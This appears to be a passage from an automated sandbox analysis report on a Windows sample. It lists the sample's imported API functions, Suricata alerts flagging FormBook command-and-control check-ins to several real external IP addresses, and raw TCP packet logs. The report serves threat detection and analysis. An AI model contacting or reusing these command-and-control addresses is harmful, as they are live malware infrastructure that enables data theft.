GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                          USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                          GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                          COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                          ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                          SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                          ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                          OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

                                                          Possible Origin

                                                          Language of compilation systemCountry where language is spokenMap
                                                          EnglishGreat Britain

                                                          Network Behavior

                                                          Suricata IDS Alerts

                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                          2024-12-03T23:27:37.679953+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.649808161.97.168.24580TCP
                                                          2024-12-03T23:27:37.679953+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.649808161.97.168.24580TCP
                                                          2024-12-03T23:27:54.985524+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64984727.124.4.24680TCP
                                                          2024-12-03T23:27:57.735515+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64985427.124.4.24680TCP
                                                          2024-12-03T23:28:00.532358+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64986027.124.4.24680TCP
                                                          2024-12-03T23:28:03.251083+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.64986827.124.4.24680TCP
                                                          2024-12-03T23:28:03.251083+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.64986827.124.4.24680TCP
                                                          2024-12-03T23:28:11.122946+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649889149.88.81.19080TCP
                                                          2024-12-03T23:28:13.813553+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649895149.88.81.19080TCP
                                                          2024-12-03T23:28:16.485474+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649900149.88.81.19080TCP
                                                          2024-12-03T23:28:19.294902+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.649907149.88.81.19080TCP
                                                          2024-12-03T23:28:19.294902+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.649907149.88.81.19080TCP
                                                          2024-12-03T23:28:27.110367+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64992785.159.66.9380TCP
                                                          2024-12-03T23:28:29.782267+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64993485.159.66.9380TCP
                                                          2024-12-03T23:28:32.454058+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64994085.159.66.9380TCP
                                                          2024-12-03T23:28:35.059248+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.64994785.159.66.9380TCP
                                                          2024-12-03T23:28:35.059248+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.64994785.159.66.9380TCP
                                                          2024-12-03T23:28:42.023341+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649965185.27.134.14480TCP
                                                          2024-12-03T23:28:44.743434+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649970185.27.134.14480TCP
                                                          2024-12-03T23:28:47.368148+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649977185.27.134.14480TCP
                                                          2024-12-03T23:28:50.156059+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.649983185.27.134.14480TCP
                                                          2024-12-03T23:28:50.156059+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.649983185.27.134.14480TCP
                                                          2024-12-03T23:28:57.141359+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649999172.67.145.23480TCP
                                                          2024-12-03T23:28:59.557104+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650005172.67.145.23480TCP
                                                          2024-12-03T23:29:02.485088+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650013172.67.145.23480TCP
                                                          2024-12-03T23:29:04.924338+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.650021172.67.145.23480TCP
                                                          2024-12-03T23:29:04.924338+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650021172.67.145.23480TCP
                                                          2024-12-03T23:29:12.000623+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650030172.67.167.14680TCP
                                                          2024-12-03T23:29:14.601977+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650031172.67.167.14680TCP
                                                          2024-12-03T23:29:17.310071+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650032172.67.167.14680TCP
                                                          2024-12-03T23:29:19.934138+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.650033172.67.167.14680TCP
                                                          2024-12-03T23:29:19.934138+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650033172.67.167.14680TCP
                                                          2024-12-03T23:29:27.125540+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650034154.88.22.10180TCP
                                                          2024-12-03T23:29:29.797405+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650036154.88.22.10180TCP
                                                          2024-12-03T23:29:32.471179+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650037154.88.22.10180TCP
                                                          2024-12-03T23:29:35.274693+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.650038154.88.22.10180TCP
                                                          2024-12-03T23:29:35.274693+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650038154.88.22.10180TCP
                                                          2024-12-03T23:29:42.352365+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650039209.74.77.10780TCP
                                                          2024-12-03T23:29:45.015365+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650040209.74.77.10780TCP
                                                          2024-12-03T23:29:47.917261+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650041209.74.77.10780TCP
                                                          2024-12-03T23:29:50.452738+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.650042209.74.77.10780TCP
                                                          2024-12-03T23:29:50.452738+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650042209.74.77.10780TCP

                                                          Network Port Distribution

                                                          TCP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Dec 3, 2024 23:27:36.303339958 CET4980880192.168.2.6161.97.168.245
                                                          Dec 3, 2024 23:27:36.427037001 CET8049808161.97.168.245192.168.2.6
                                                          Dec 3, 2024 23:27:36.427265882 CET4980880192.168.2.6161.97.168.245
                                                          Dec 3, 2024 23:27:36.438179016 CET4980880192.168.2.6161.97.168.245
                                                          Dec 3, 2024 23:27:36.562062979 CET8049808161.97.168.245192.168.2.6
                                                          Dec 3, 2024 23:27:37.679775000 CET8049808161.97.168.245192.168.2.6
                                                          Dec 3, 2024 23:27:37.679797888 CET8049808161.97.168.245192.168.2.6
                                                          Dec 3, 2024 23:27:37.679811001 CET8049808161.97.168.245192.168.2.6
                                                          Dec 3, 2024 23:27:37.679953098 CET4980880192.168.2.6161.97.168.245
                                                          Dec 3, 2024 23:27:37.680190086 CET8049808161.97.168.245192.168.2.6
                                                          Dec 3, 2024 23:27:37.680238008 CET4980880192.168.2.6161.97.168.245
                                                          Dec 3, 2024 23:27:37.685218096 CET4980880192.168.2.6161.97.168.245
                                                          Dec 3, 2024 23:27:37.811266899 CET8049808161.97.168.245192.168.2.6
                                                          Dec 3, 2024 23:27:53.414469957 CET4984780192.168.2.627.124.4.246
                                                          Dec 3, 2024 23:27:53.538599968 CET804984727.124.4.246192.168.2.6
                                                          Dec 3, 2024 23:27:53.538691044 CET4984780192.168.2.627.124.4.246
                                                          Dec 3, 2024 23:27:53.554835081 CET4984780192.168.2.627.124.4.246
                                                          Dec 3, 2024 23:27:53.678704023 CET804984727.124.4.246192.168.2.6
                                                          Dec 3, 2024 23:27:54.936975002 CET804984727.124.4.246192.168.2.6
                                                          Dec 3, 2024 23:27:54.985523939 CET4984780192.168.2.627.124.4.246
                                                          Dec 3, 2024 23:27:55.063714027 CET4984780192.168.2.627.124.4.246
                                                          Dec 3, 2024 23:27:55.138844013 CET804984727.124.4.246192.168.2.6
                                                          Dec 3, 2024 23:27:55.139002085 CET4984780192.168.2.627.124.4.246
                                                          Dec 3, 2024 23:27:56.136023998 CET4985480192.168.2.627.124.4.246
                                                          Dec 3, 2024 23:27:56.259985924 CET804985427.124.4.246192.168.2.6
                                                          Dec 3, 2024 23:27:56.263247013 CET4985480192.168.2.627.124.4.246
                                                          Dec 3, 2024 23:27:56.338972092 CET4985480192.168.2.627.124.4.246
                                                          Dec 3, 2024 23:27:56.462785006 CET804985427.124.4.246192.168.2.6
                                                          Dec 3, 2024 23:27:57.694483995 CET804985427.124.4.246192.168.2.6
                                                          Dec 3, 2024 23:27:57.735515118 CET4985480192.168.2.627.124.4.246
                                                          Dec 3, 2024 23:27:57.845241070 CET4985480192.168.2.627.124.4.246
                                                          Dec 3, 2024 23:27:57.905749083 CET804985427.124.4.246192.168.2.6
                                                          Dec 3, 2024 23:27:57.906109095 CET4985480192.168.2.627.124.4.246
                                                          Dec 3, 2024 23:27:58.956460953 CET4986080192.168.2.627.124.4.246
                                                          Dec 3, 2024 23:27:59.080395937 CET804986027.124.4.246192.168.2.6
                                                          Dec 3, 2024 23:27:59.080507994 CET4986080192.168.2.627.124.4.246
                                                          Dec 3, 2024 23:27:59.095851898 CET4986080192.168.2.627.124.4.246
                                                          Dec 3, 2024 23:27:59.219801903 CET804986027.124.4.246192.168.2.6
                                                          Dec 3, 2024 23:27:59.219903946 CET804986027.124.4.246192.168.2.6
                                                          Dec 3, 2024 23:28:00.486567974 CET804986027.124.4.246192.168.2.6
                                                          Dec 3, 2024 23:28:00.532357931 CET4986080192.168.2.627.124.4.246
                                                          Dec 3, 2024 23:28:00.610752106 CET4986080192.168.2.627.124.4.246
                                                          Dec 3, 2024 23:28:00.688097000 CET804986027.124.4.246192.168.2.6
                                                          Dec 3, 2024 23:28:00.688169956 CET4986080192.168.2.627.124.4.246
                                                          Dec 3, 2024 23:28:01.629242897 CET4986880192.168.2.627.124.4.246
                                                          Dec 3, 2024 23:28:01.753851891 CET804986827.124.4.246192.168.2.6
                                                          Dec 3, 2024 23:28:01.753992081 CET4986880192.168.2.627.124.4.246
                                                          Dec 3, 2024 23:28:01.763202906 CET4986880192.168.2.627.124.4.246
                                                          Dec 3, 2024 23:28:01.886950970 CET804986827.124.4.246192.168.2.6
                                                          Dec 3, 2024 23:28:03.208520889 CET804986827.124.4.246192.168.2.6
                                                          Dec 3, 2024 23:28:03.251082897 CET4986880192.168.2.627.124.4.246
                                                          Dec 3, 2024 23:28:03.419338942 CET804986827.124.4.246192.168.2.6
                                                          Dec 3, 2024 23:28:03.419769049 CET4986880192.168.2.627.124.4.246
                                                          Dec 3, 2024 23:28:03.420646906 CET4986880192.168.2.627.124.4.246
                                                          Dec 3, 2024 23:28:03.544329882 CET804986827.124.4.246192.168.2.6
                                                          Dec 3, 2024 23:28:09.486522913 CET4988980192.168.2.6149.88.81.190
                                                          Dec 3, 2024 23:28:09.610496044 CET8049889149.88.81.190192.168.2.6
                                                          Dec 3, 2024 23:28:09.610568047 CET4988980192.168.2.6149.88.81.190
                                                          Dec 3, 2024 23:28:09.639137030 CET4988980192.168.2.6149.88.81.190
                                                          Dec 3, 2024 23:28:09.763396978 CET8049889149.88.81.190192.168.2.6
                                                          Dec 3, 2024 23:28:11.122781038 CET8049889149.88.81.190192.168.2.6
                                                          Dec 3, 2024 23:28:11.122895956 CET8049889149.88.81.190192.168.2.6
                                                          Dec 3, 2024 23:28:11.122946024 CET4988980192.168.2.6149.88.81.190
                                                          Dec 3, 2024 23:28:11.141707897 CET4988980192.168.2.6149.88.81.190
                                                          Dec 3, 2024 23:28:12.160366058 CET4989580192.168.2.6149.88.81.190
                                                          Dec 3, 2024 23:28:12.286582947 CET8049895149.88.81.190192.168.2.6
                                                          Dec 3, 2024 23:28:12.286726952 CET4989580192.168.2.6149.88.81.190
                                                          Dec 3, 2024 23:28:12.301398039 CET4989580192.168.2.6149.88.81.190
                                                          Dec 3, 2024 23:28:12.425118923 CET8049895149.88.81.190192.168.2.6
                                                          Dec 3, 2024 23:28:13.813553095 CET4989580192.168.2.6149.88.81.190
                                                          Dec 3, 2024 23:28:13.841598988 CET8049895149.88.81.190192.168.2.6
                                                          Dec 3, 2024 23:28:13.841670990 CET4989580192.168.2.6149.88.81.190
                                                          Dec 3, 2024 23:28:13.841712952 CET8049895149.88.81.190192.168.2.6
                                                          Dec 3, 2024 23:28:13.841772079 CET4989580192.168.2.6149.88.81.190
                                                          Dec 3, 2024 23:28:13.937294006 CET8049895149.88.81.190192.168.2.6
                                                          Dec 3, 2024 23:28:13.937344074 CET4989580192.168.2.6149.88.81.190
                                                          Dec 3, 2024 23:28:14.832412004 CET4990080192.168.2.6149.88.81.190
                                                          Dec 3, 2024 23:28:14.956202984 CET8049900149.88.81.190192.168.2.6
                                                          Dec 3, 2024 23:28:14.956430912 CET4990080192.168.2.6149.88.81.190
                                                          Dec 3, 2024 23:28:14.970340967 CET4990080192.168.2.6149.88.81.190
                                                          Dec 3, 2024 23:28:15.094333887 CET8049900149.88.81.190192.168.2.6
                                                          Dec 3, 2024 23:28:15.094362020 CET8049900149.88.81.190192.168.2.6
                                                          Dec 3, 2024 23:28:16.485474110 CET4990080192.168.2.6149.88.81.190
                                                          Dec 3, 2024 23:28:16.509211063 CET8049900149.88.81.190192.168.2.6
                                                          Dec 3, 2024 23:28:16.509305954 CET8049900149.88.81.190192.168.2.6
                                                          Dec 3, 2024 23:28:16.509387970 CET4990080192.168.2.6149.88.81.190
                                                          Dec 3, 2024 23:28:16.509426117 CET4990080192.168.2.6149.88.81.190
                                                          Dec 3, 2024 23:28:16.609231949 CET8049900149.88.81.190192.168.2.6
                                                          Dec 3, 2024 23:28:16.609316111 CET4990080192.168.2.6149.88.81.190
                                                          Dec 3, 2024 23:28:17.504862070 CET4990780192.168.2.6149.88.81.190
                                                          Dec 3, 2024 23:28:17.628637075 CET8049907149.88.81.190192.168.2.6
                                                          Dec 3, 2024 23:28:17.628741980 CET4990780192.168.2.6149.88.81.190
                                                          Dec 3, 2024 23:28:17.637489080 CET4990780192.168.2.6149.88.81.190
                                                          Dec 3, 2024 23:28:17.761248112 CET8049907149.88.81.190192.168.2.6
                                                          Dec 3, 2024 23:28:19.293936014 CET8049907149.88.81.190192.168.2.6
                                                          Dec 3, 2024 23:28:19.294540882 CET8049907149.88.81.190192.168.2.6
                                                          Dec 3, 2024 23:28:19.294902086 CET4990780192.168.2.6149.88.81.190
                                                          Dec 3, 2024 23:28:19.299998045 CET4990780192.168.2.6149.88.81.190
                                                          Dec 3, 2024 23:28:19.426107883 CET8049907149.88.81.190192.168.2.6
                                                          Dec 3, 2024 23:28:25.461455107 CET4992780192.168.2.685.159.66.93
                                                          Dec 3, 2024 23:28:25.585392952 CET804992785.159.66.93192.168.2.6
                                                          Dec 3, 2024 23:28:25.585483074 CET4992780192.168.2.685.159.66.93
                                                          Dec 3, 2024 23:28:25.600266933 CET4992780192.168.2.685.159.66.93
                                                          Dec 3, 2024 23:28:25.724215984 CET804992785.159.66.93192.168.2.6
                                                          Dec 3, 2024 23:28:27.110367060 CET4992780192.168.2.685.159.66.93
                                                          Dec 3, 2024 23:28:27.237286091 CET804992785.159.66.93192.168.2.6
                                                          Dec 3, 2024 23:28:27.237394094 CET4992780192.168.2.685.159.66.93
                                                          Dec 3, 2024 23:28:28.129123926 CET4993480192.168.2.685.159.66.93
                                                          Dec 3, 2024 23:28:28.252948046 CET804993485.159.66.93192.168.2.6
                                                          Dec 3, 2024 23:28:28.253036976 CET4993480192.168.2.685.159.66.93
                                                          Dec 3, 2024 23:28:28.268274069 CET4993480192.168.2.685.159.66.93
                                                          Dec 3, 2024 23:28:28.392070055 CET804993485.159.66.93192.168.2.6
                                                          Dec 3, 2024 23:28:29.782267094 CET4993480192.168.2.685.159.66.93
                                                          Dec 3, 2024 23:28:29.906420946 CET804993485.159.66.93192.168.2.6
                                                          Dec 3, 2024 23:28:29.906496048 CET4993480192.168.2.685.159.66.93
                                                          Dec 3, 2024 23:28:30.801023006 CET4994080192.168.2.685.159.66.93
                                                          Dec 3, 2024 23:28:30.925002098 CET804994085.159.66.93192.168.2.6
                                                          Dec 3, 2024 23:28:30.925117016 CET4994080192.168.2.685.159.66.93
                                                          Dec 3, 2024 23:28:30.941718102 CET4994080192.168.2.685.159.66.93
                                                          Dec 3, 2024 23:28:31.065541983 CET804994085.159.66.93192.168.2.6
                                                          Dec 3, 2024 23:28:31.065637112 CET804994085.159.66.93192.168.2.6
                                                          Dec 3, 2024 23:28:32.454057932 CET4994080192.168.2.685.159.66.93
                                                          Dec 3, 2024 23:28:32.582851887 CET804994085.159.66.93192.168.2.6
                                                          Dec 3, 2024 23:28:32.582923889 CET4994080192.168.2.685.159.66.93
                                                          Dec 3, 2024 23:28:33.472176075 CET4994780192.168.2.685.159.66.93
                                                          Dec 3, 2024 23:28:33.596039057 CET804994785.159.66.93192.168.2.6
                                                          Dec 3, 2024 23:28:33.596232891 CET4994780192.168.2.685.159.66.93
                                                          Dec 3, 2024 23:28:33.605660915 CET4994780192.168.2.685.159.66.93
                                                          Dec 3, 2024 23:28:33.729337931 CET804994785.159.66.93192.168.2.6
                                                          Dec 3, 2024 23:28:35.058809996 CET804994785.159.66.93192.168.2.6
                                                          Dec 3, 2024 23:28:35.059003115 CET804994785.159.66.93192.168.2.6
                                                          Dec 3, 2024 23:28:35.059247971 CET4994780192.168.2.685.159.66.93
                                                          Dec 3, 2024 23:28:35.064918995 CET4994780192.168.2.685.159.66.93
                                                          Dec 3, 2024 23:28:35.188782930 CET804994785.159.66.93192.168.2.6
                                                          Dec 3, 2024 23:28:40.599915028 CET4996580192.168.2.6185.27.134.144
                                                          Dec 3, 2024 23:28:40.723627090 CET8049965185.27.134.144192.168.2.6
                                                          Dec 3, 2024 23:28:40.723752022 CET4996580192.168.2.6185.27.134.144
                                                          Dec 3, 2024 23:28:40.744406939 CET4996580192.168.2.6185.27.134.144
                                                          Dec 3, 2024 23:28:40.868180037 CET8049965185.27.134.144192.168.2.6
                                                          Dec 3, 2024 23:28:42.023236036 CET8049965185.27.134.144192.168.2.6
                                                          Dec 3, 2024 23:28:42.023292065 CET8049965185.27.134.144192.168.2.6
                                                          Dec 3, 2024 23:28:42.023340940 CET4996580192.168.2.6185.27.134.144
                                                          Dec 3, 2024 23:28:42.251039982 CET4996580192.168.2.6185.27.134.144
                                                          Dec 3, 2024 23:28:43.269294977 CET4997080192.168.2.6185.27.134.144
                                                          Dec 3, 2024 23:28:43.393081903 CET8049970185.27.134.144192.168.2.6
                                                          Dec 3, 2024 23:28:43.393237114 CET4997080192.168.2.6185.27.134.144
                                                          Dec 3, 2024 23:28:43.408987999 CET4997080192.168.2.6185.27.134.144
                                                          Dec 3, 2024 23:28:43.532663107 CET8049970185.27.134.144192.168.2.6
                                                          Dec 3, 2024 23:28:44.743237019 CET8049970185.27.134.144192.168.2.6
                                                          Dec 3, 2024 23:28:44.743355036 CET8049970185.27.134.144192.168.2.6
                                                          Dec 3, 2024 23:28:44.743433952 CET4997080192.168.2.6185.27.134.144
                                                          Dec 3, 2024 23:28:44.922688961 CET4997080192.168.2.6185.27.134.144
                                                          Dec 3, 2024 23:28:45.941412926 CET4997780192.168.2.6185.27.134.144
                                                          Dec 3, 2024 23:28:46.066138983 CET8049977185.27.134.144192.168.2.6
                                                          Dec 3, 2024 23:28:46.066243887 CET4997780192.168.2.6185.27.134.144
                                                          Dec 3, 2024 23:28:46.080183983 CET4997780192.168.2.6185.27.134.144
                                                          Dec 3, 2024 23:28:46.320729971 CET8049977185.27.134.144192.168.2.6
                                                          Dec 3, 2024 23:28:46.320744038 CET8049977185.27.134.144192.168.2.6
                                                          Dec 3, 2024 23:28:47.367964983 CET8049977185.27.134.144192.168.2.6
                                                          Dec 3, 2024 23:28:47.368092060 CET8049977185.27.134.144192.168.2.6
                                                          Dec 3, 2024 23:28:47.368148088 CET4997780192.168.2.6185.27.134.144
                                                          Dec 3, 2024 23:28:47.594563007 CET4997780192.168.2.6185.27.134.144
                                                          Dec 3, 2024 23:28:48.730777025 CET4998380192.168.2.6185.27.134.144
                                                          Dec 3, 2024 23:28:48.854489088 CET8049983185.27.134.144192.168.2.6
                                                          Dec 3, 2024 23:28:48.854687929 CET4998380192.168.2.6185.27.134.144
                                                          Dec 3, 2024 23:28:48.866777897 CET4998380192.168.2.6185.27.134.144
                                                          Dec 3, 2024 23:28:48.990953922 CET8049983185.27.134.144192.168.2.6
                                                          Dec 3, 2024 23:28:50.155714989 CET8049983185.27.134.144192.168.2.6
                                                          Dec 3, 2024 23:28:50.155879021 CET8049983185.27.134.144192.168.2.6
                                                          Dec 3, 2024 23:28:50.156059027 CET4998380192.168.2.6185.27.134.144
                                                          Dec 3, 2024 23:28:50.158879995 CET4998380192.168.2.6185.27.134.144
                                                          Dec 3, 2024 23:28:50.282625914 CET8049983185.27.134.144192.168.2.6
                                                          Dec 3, 2024 23:28:55.499874115 CET4999980192.168.2.6172.67.145.234
                                                          Dec 3, 2024 23:28:55.624013901 CET8049999172.67.145.234192.168.2.6
                                                          Dec 3, 2024 23:28:55.624217033 CET4999980192.168.2.6172.67.145.234
                                                          Dec 3, 2024 23:28:55.640727043 CET4999980192.168.2.6172.67.145.234
                                                          Dec 3, 2024 23:28:55.764676094 CET8049999172.67.145.234192.168.2.6
                                                          Dec 3, 2024 23:28:57.141359091 CET4999980192.168.2.6172.67.145.234
                                                          Dec 3, 2024 23:28:57.237117052 CET8049999172.67.145.234192.168.2.6
                                                          Dec 3, 2024 23:28:57.237629890 CET4999980192.168.2.6172.67.145.234
                                                          Dec 3, 2024 23:28:57.238085032 CET8049999172.67.145.234192.168.2.6
                                                          Dec 3, 2024 23:28:57.241008997 CET4999980192.168.2.6172.67.145.234
                                                          Dec 3, 2024 23:28:57.265108109 CET8049999172.67.145.234192.168.2.6
                                                          Dec 3, 2024 23:28:57.265203953 CET4999980192.168.2.6172.67.145.234
                                                          Dec 3, 2024 23:28:58.160584927 CET5000580192.168.2.6172.67.145.234
                                                          Dec 3, 2024 23:28:58.285455942 CET8050005172.67.145.234192.168.2.6
                                                          Dec 3, 2024 23:28:58.285537004 CET5000580192.168.2.6172.67.145.234
                                                          Dec 3, 2024 23:28:58.305460930 CET5000580192.168.2.6172.67.145.234
                                                          Dec 3, 2024 23:28:58.429153919 CET8050005172.67.145.234192.168.2.6
                                                          Dec 3, 2024 23:28:59.554809093 CET8050005172.67.145.234192.168.2.6
                                                          Dec 3, 2024 23:28:59.557051897 CET8050005172.67.145.234192.168.2.6
                                                          Dec 3, 2024 23:28:59.557104111 CET5000580192.168.2.6172.67.145.234
                                                          Dec 3, 2024 23:28:59.813199997 CET5000580192.168.2.6172.67.145.234
                                                          Dec 3, 2024 23:29:00.831862926 CET5001380192.168.2.6172.67.145.234
                                                          Dec 3, 2024 23:29:00.957336903 CET8050013172.67.145.234192.168.2.6
                                                          Dec 3, 2024 23:29:00.957429886 CET5001380192.168.2.6172.67.145.234
                                                          Dec 3, 2024 23:29:00.977037907 CET5001380192.168.2.6172.67.145.234
                                                          Dec 3, 2024 23:29:01.100874901 CET8050013172.67.145.234192.168.2.6
                                                          Dec 3, 2024 23:29:01.100992918 CET8050013172.67.145.234192.168.2.6
                                                          Dec 3, 2024 23:29:02.485088110 CET5001380192.168.2.6172.67.145.234
                                                          Dec 3, 2024 23:29:02.517219067 CET8050013172.67.145.234192.168.2.6
                                                          Dec 3, 2024 23:29:02.517292023 CET5001380192.168.2.6172.67.145.234
                                                          Dec 3, 2024 23:29:02.517656088 CET8050013172.67.145.234192.168.2.6
                                                          Dec 3, 2024 23:29:02.517700911 CET5001380192.168.2.6172.67.145.234
                                                          Dec 3, 2024 23:29:02.608814001 CET8050013172.67.145.234192.168.2.6
                                                          Dec 3, 2024 23:29:02.608871937 CET5001380192.168.2.6172.67.145.234
